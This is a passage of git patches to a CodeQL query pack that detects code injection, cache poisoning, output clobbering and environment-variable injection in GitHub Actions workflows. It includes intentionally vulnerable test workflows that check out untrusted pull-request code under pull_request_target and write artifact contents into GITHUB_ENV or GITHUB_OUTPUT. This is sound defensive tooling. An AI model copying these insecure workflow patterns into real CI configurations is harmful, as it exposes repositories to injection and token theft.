.github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | -| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | -| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | | .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:28:9:32:6 | Uses Step | -| .github/workflows/test5.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | | .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:54:9:58:6 | Uses Step | -| .github/workflows/test5.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test5.yml:58:9:60:2 | Run Step | | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | -| .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test9.yml:11:9:16:6 | Uses Step | .github/workflows/test9.yml:16:9:17:48 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | -| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | -| .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | -| .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | | .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | -| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | | .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:11:7:12:18 | Run Step | | .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | -| .github/workflows/untrusted_checkout3.yml:11:9:12:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | +| .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | | .github/workflows/untrusted_checkout3.yml:12:9:13:6 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select From 76ded33280cf2a6ea8c8c2abb05bb37dc6b41a39 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 13 Jul 2024 23:29:36 +0200 Subject: [PATCH 0418/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5cf222d25c..6b17e77e063 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.20 +version: 0.1.21 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6def1dfc0c8..d17bc34b9ab 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.20 +version: 0.1.21 groups: [actions, queries] suites: codeql-suites extractor: javascript From fc39249f924d5a8ed2a5ee5584a084b617543144 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 15 Jul 2024 21:00:28 +0200 Subject: [PATCH 0419/1267] feat(queries): Consider untrusted checkout as a source for code injections --- .../codeql/actions/dataflow/FlowSources.qll | 10 +++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 37 ++++++++++++++----- ql/lib/qlpack.yml | 2 +- ql/src/Security/CWE-349/CachePoisoning.ql | 16 +++++--- ql/src/qlpack.yml | 2 +- .../.github/workflows/untrusted_checkout1.yml | 15 ++++++++ .../CWE-094/CodeInjectionCritical.expected | 8 ++++ .../CWE-094/CodeInjectionMedium.expected | 7 ++++ 8 files changed, 79 insertions(+), 18 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 31cf33782b0..9f91af470b2 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -1,4 +1,5 @@ private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery private import codeql.actions.config.Config private import codeql.actions.dataflow.ExternalFlow @@ -112,6 +113,15 @@ private class ArtifactSource extends RemoteFlowSource { override string getSourceType() { result = "artifact" } } +/** + * A file from an untrusted checkout. + */ +private class CheckoutSource extends RemoteFlowSource { + CheckoutSource() { this.asExpr() instanceof PRHeadCheckoutStep } + + override string getSourceType() { result = "artifact" } +} + /** * A list of file names returned by dorny/paths-filter. */ diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 3caf80b7ca8..e16bc00f8ea 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.UntrustedCheckoutQuery /** * A unit class for adding additional taint steps. @@ -161,7 +162,11 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * echo "::set-output name=id::$foo */ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, UntrustedArtifactDownloadStep download, string content, string key, string value | + exists(Run run, Step artifact, string content, string key, string value | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and ( // A file is read and its content is assigned to an env var // - run: | @@ -185,7 +190,7 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da outputsPartialFileContent(value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - download.getAFollowingStep() = run and + artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run ) @@ -199,7 +204,11 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da * echo "bar=${foo}" >> "$GITHUB_ENV" */ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string content, string key, string value, UntrustedArtifactDownloadStep download | + exists(Run run, string content, string key, string value, Step artifact | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and ( // A file is read and its content is assigned to an env var // - run: | @@ -223,7 +232,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF outputsPartialFileContent(value) ) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and - download.getAFollowingStep() = run and + artifact.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() @@ -234,10 +243,14 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF * A download artifact step followed by a step that may use downloaded artifacts. */ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UntrustedArtifactDownloadStep download, Run run | - pred.asExpr() = download and + exists(Step artifact, Run run | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and + pred.asExpr() = artifact and succ.asExpr() = run.getScriptScalar() and - download.getAFollowingStep() = run + artifact.getAFollowingStep() = run ) } @@ -245,11 +258,15 @@ predicate artifactDownloadToRunStep(DataFlow::Node pred, DataFlow::Node succ) { * A download artifact step followed by a envvar-injection uses step . */ predicate artifactDownloadToUsesStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(UntrustedArtifactDownloadStep download, Uses uses | + exists(Step artifact, Uses uses | + ( + artifact instanceof UntrustedArtifactDownloadStep or + artifact instanceof PRHeadCheckoutStep + ) and madSink(succ, "envvar-injection") and - pred.asExpr() = download and + pred.asExpr() = artifact and succ.asExpr() = uses and - download.getAFollowingStep() = uses + artifact.getAFollowingStep() = uses ) } diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 6b17e77e063..75d8cd5d2e0 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.21 +version: 0.1.22 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 3b69110ed12..6609dae2b7f 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql @@ -12,6 +12,7 @@ */ import actions +import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps @@ -19,13 +20,17 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from LocalJob j, Event e, PRHeadCheckoutStep checkout, Step s +from LocalJob j, Event e, Step artifact, Step s where + ( + artifact instanceof PRHeadCheckoutStep or + artifact instanceof UntrustedArtifactDownloadStep + ) and j.getATriggerEvent() = e and // job can be triggered by an external user e.isExternallyTriggerable() and // the checkout is not controlled by an access check - not exists(ControlCheck check | check.protects(checkout, j.getATriggerEvent())) and + not exists(ControlCheck check | check.protects(artifact, j.getATriggerEvent())) and ( // the workflow runs in the context of the default branch runsOnDefaultBranch(e) @@ -38,8 +43,7 @@ where ) ) and // the job checkouts untrusted code from a pull request - // TODO: Consider adding artifact downloads as a potential source of cache poisoning - j.getAStep() = checkout and + j.getAStep() = artifact and ( // the job writes to the cache // (No need to follow the checkout step as the cache writing is normally done after the job completes) @@ -49,9 +53,9 @@ where or // the job executes checked-out code // (The cache specific token can be leaked even for non-privileged workflows) - checkout.getAFollowingStep() = s and + artifact.getAFollowingStep() = s and s instanceof PoisonableStep and // excluding privileged workflows since they can be exploited in easier circumstances not j.isPrivileged() ) -select s, checkout, s, "Potential cache poisoning in the context of the default branch" +select s, artifact, s, "Potential cache poisoning in the context of the default branch" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d17bc34b9ab..ce8ab4c24dd 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.21 +version: 0.1.22 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml new file mode 100644 index 00000000000..8f691ed759d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/untrusted_checkout1.yml @@ -0,0 +1,15 @@ +on: + pull_request_target + +jobs: + build: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: artifact + run: | + echo "::set-output name=pr_number::$( Date: Mon, 15 Jul 2024 21:00:54 +0200 Subject: [PATCH 0420/1267] feat(queries): Experimental Output clobbering query --- .../security/OutputClobberingQuery.qll | 43 +++++++++++++++++++ .../CWE-094/OutputClobberingMedium.ql | 31 +++++++++++++ .../.github/workflows/output_clobbering1.yml | 20 +++++++++ .../.github/workflows/output_clobbering2.yml | 14 ++++++ 4 files changed, 108 insertions(+) create mode 100644 ql/lib/codeql/actions/security/OutputClobberingQuery.qll create mode 100644 ql/src/Security/CWE-094/OutputClobberingMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll new file mode 100644 index 00000000000..f1811ed5762 --- /dev/null +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -0,0 +1,43 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +private import codeql.actions.security.CodeInjectionQuery +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.dataflow.FlowSources +import codeql.actions.DataFlow + +abstract class OutputClobberingSource extends Step { } + +class RunOutputClobbering extends OutputClobberingSource, Run { + RunOutputClobbering() { + exists(UntrustedArtifactDownloadStep download, string script | + download.getAFollowingStep() = this and + this.getScript() = script and + exists(int i | + script.splitAt("\n", i).matches(["%GITHUB_OUTPUT%", "%::set-output name%"]) and + i < count(string line | line = script.splitAt("\n") | line) - 1 + ) + ) + } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module OutputClobberingConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source.asExpr() instanceof OutputClobberingSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node prev, DataFlow::Node succ) { + exists(StepsExpression e | + e.getTarget() = prev.asExpr() and + prev.asExpr() instanceof OutputClobberingSource and + succ.asExpr() = e + ) + } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module OutputClobberingFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-094/OutputClobberingMedium.ql b/ql/src/Security/CWE-094/OutputClobberingMedium.ql new file mode 100644 index 00000000000..7094a7891da --- /dev/null +++ b/ql/src/Security/CWE-094/OutputClobberingMedium.ql @@ -0,0 +1,31 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/output-clobbering/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import OutputClobberingFlow::PathGraph + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) + ) +select sink.getNode(), source, sink, "Potential output clobbering leading to code injection in $@.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml new file mode 100644 index 00000000000..9012eda2649 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering1.yml @@ -0,0 +1,20 @@ +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - id: version + run: | + echo "version=10" >> "${GITHUB_OUTPUT}" + ls + - run: echo ${{ steps.version.outputs.version }} + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml new file mode 100644 index 00000000000..e2479e90636 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/output_clobbering2.yml @@ -0,0 +1,14 @@ +on: pull_request_target +jobs: + test: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + - id: version + run: | + echo "version=10" >> "${GITHUB_OUTPUT}" + ls + - run: echo ${{ steps.version.outputs.version }} + From 15649afd5c2cfe2e53e0f643da1a62097adcafb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 22 Jul 2024 12:44:27 +0200 Subject: [PATCH 0421/1267] feat(queries): Improve envvar injection queries Consider those cases where the contents of a file are written to a var and that var assigned to GITHUB_ENV --- .../security/EnvPathInjectionQuery.qll | 20 ++++++- .../actions/security/EnvVarInjectionQuery.qll | 20 ++++++- .../CWE-077/.github/workflows/test8.yml | 41 ++++++++++++++ .../CWE-077/.github/workflows/test9.yml | 41 ++++++++++++++ .../CWE-077/EnvVarInjectionCritical.expected | 14 +++++ .../CWE-077/EnvVarInjectionMedium.expected | 10 ++++ .../CWE-094/.github/workflows/test11.yml | 56 +++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 21 +++++++ .../CWE-094/CodeInjectionMedium.expected | 19 +++++++ 9 files changed, 240 insertions(+), 2 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test11.yml diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index 41e72bc8388..ee9f4843470 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -20,7 +20,25 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and writeToGitHubPath(run, value) and - outputsPartialFileContent(value) + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_PATH + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) + ) ) } } diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 8dba1a21c90..652b97b887f 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -22,7 +22,25 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { step.getAFollowingStep() = run and writeToGitHubEnv(run, content) and extractVariableAndValue(content, _, value) and - outputsPartialFileContent(value) + ( + outputsPartialFileContent(value) + or + // e.g. + // FOO=$(cat test-results/sha-number) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var_name, string var_value | + run.getScript().splitAt("\n") = line + | + var_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + outputsPartialFileContent(var_value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + value.matches("$(echo %") and value.indexOf(var_name) > 0 + ) + ) + ) ) } } diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml new file mode 100644 index 00000000000..05bde57551d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -0,0 +1,41 @@ +name: Tests + +on: + workflow_run: + workflows: ["tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + unit-test-results: + name: Test + runs-on: ubuntu-latest + permissions: + actions: write + statuses: write + checks: write + pull-requests: write + contents: write + steps: + - uses: actions/checkout@v4 + with: + ref: foo + + - name: Download and Extract Artifacts + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + path: ./artifacts + + - name: assignment + run: | + foo=$(cat ./artifacts/parent-artifacts/event.txt) + echo "foo=$foo" >> $GITHUB_ENV + - name: direct 1 + run: | + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + - name: direct 2 + run: | + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml new file mode 100644 index 00000000000..3ed80374ef6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -0,0 +1,41 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 02aed1c05cb..7d92032f00b 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ 